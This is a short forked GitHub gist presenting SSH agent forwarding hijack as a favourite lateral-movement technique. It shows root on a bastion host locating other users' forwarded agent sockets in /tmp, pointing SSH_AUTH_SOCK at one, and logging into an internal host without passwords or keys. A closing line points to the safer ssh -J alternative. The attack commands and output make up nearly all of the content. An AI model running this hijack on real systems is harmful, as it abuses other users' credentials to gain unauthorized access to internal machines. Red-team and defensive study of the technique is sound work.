leftp/SSH Agent Forwarding.md

Forked from int0x80/SSH Agent Forwarding.md

Created January 13, 2021 07:42

Star (0) You must be signed in to star a gist
Fork (0) You must be signed in to fork a gist

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/leftp/ac365b51bc051f6ddada913e1e828461.js"></script>
Save leftp/ac365b51bc051f6ddada913e1e828461 to your computer and use it in GitHub Desktop.

Raw

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh [email protected]

user@internal:~$ hostname -f
internal.company.tld

This post explains it well and details the safer ssh -J alternative.